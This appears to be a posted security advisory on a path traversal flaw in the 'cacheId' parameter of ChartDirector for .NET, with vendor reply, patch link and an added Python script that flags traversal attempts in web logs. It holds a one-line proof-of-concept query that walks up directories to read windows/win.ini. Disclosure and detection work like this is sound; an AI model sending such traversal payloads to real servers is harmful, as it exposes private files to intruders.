Topic Articles: ChartDirector Critical File Access
Posted on Sunday, September 06 @ 05:17:44 EDT by DokFLeed

 Latest Threats

Advisory No.: ISNSC-0910  
=============
ChartDirector Critical File Access 

Information
======
Author: DokFLeed 
Program Affected: http://www.chartdir.com for .NET 
Severity: Critical.
Type of Advisory: Mid Disclosure.
Affected/Tested Versions: Random

Program Description 
==================
Widely used Chart Component on Financial & Stock Trading websites

Overview 
=========
The query variable "cacheId=" is not sanitized, which can allow critical files to be downloaded.


Proof Of Concept
================
?ChartDirectorChartImage=chart_WebChartViewer1&cacheId=/../../../../../../../../windows/win.ini


Solution/Fix
============
Upgrade to the latest ChartDirector or apply the following patch (ChartDirector for .NET Ver 5.0.1 Patch 2):
http://www.advsofteng.com/netchartdir501p2.zip
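
To check whether a server was probed for this issue before it was upgraded, the following added example (not part of the original advisory or of the vendor's code) scans web access logs for "cacheId" values that decode to path syntax. The log lines, the /quotes.aspx page name and the rule that a legitimate cache ID never contains path characters are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Matches the cacheId parameter in a quoted request line (combined log
# format) or in a separate query field (IIS W3C format).
CACHE_ID = re.compile(r'[?&\s]cacheId=([^&\s"]*)', re.IGNORECASE)

# Assumption: a legitimate cache identifier never contains path syntax
# (separators, drive colon, NUL byte or a parent-directory sequence).
PATH_SYNTAX = re.compile(r'[/\\:\x00]|\.\.')


def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding so %252e%252e is seen as '..'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan(lines):
    """Return (line_number, decoded cacheId) for every suspicious request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for raw in CACHE_ID.findall(line):
            value = fully_decode(raw)
            if PATH_SYNTAX.search(value):
                hits.append((number, value))
    return hits


# Constructed sample log lines (client addresses from documentation ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [06/Sep/2009:05:10:01 -0400] "GET /quotes.aspx?'
    'ChartDirectorChartImage=chart_WebChartViewer1&cacheId=3f9a2c HTTP/1.1" 200 18234',
    '203.0.113.9 - - [06/Sep/2009:05:12:40 -0400] "GET /quotes.aspx?'
    'ChartDirectorChartImage=chart_WebChartViewer1'
    '&cacheId=/../../../../../../../../windows/win.ini HTTP/1.1" 200 478',
    '2009-09-06 09:12:44 GET /quotes.aspx ChartDirectorChartImage='
    'chart_WebChartViewer1&cacheId=%2F..%2F..%2Fwindows%2Fwin.ini 203.0.113.9 200',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: cacheId decodes to {value!r}")
```

A flagged request that was answered with status 200 on an unpatched version deserves the closest look, since the requested file may have been returned.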

Vendor Status
============
Vendor contacted & replied with "The problem you mention affects ChartDirector for .NET.
The current version of ChartDirector for .NET on our web site (Ver 5.0.2) already has this issue fixed.
So this issue no longer occurs with the current version of ChartDirector for .NET.
For people using earlier versions of ChartDirector, it is suggested they upgrade to the latest version.
They may also apply the following patch (ChartDirector for .NET Ver 5.0.1 Patch 2):
http://www.advsofteng.com/netchartdir501p2.zip "

Reference
============
http://dokfleed.net/duh/modules.php?name=News&file=article&sid=48

 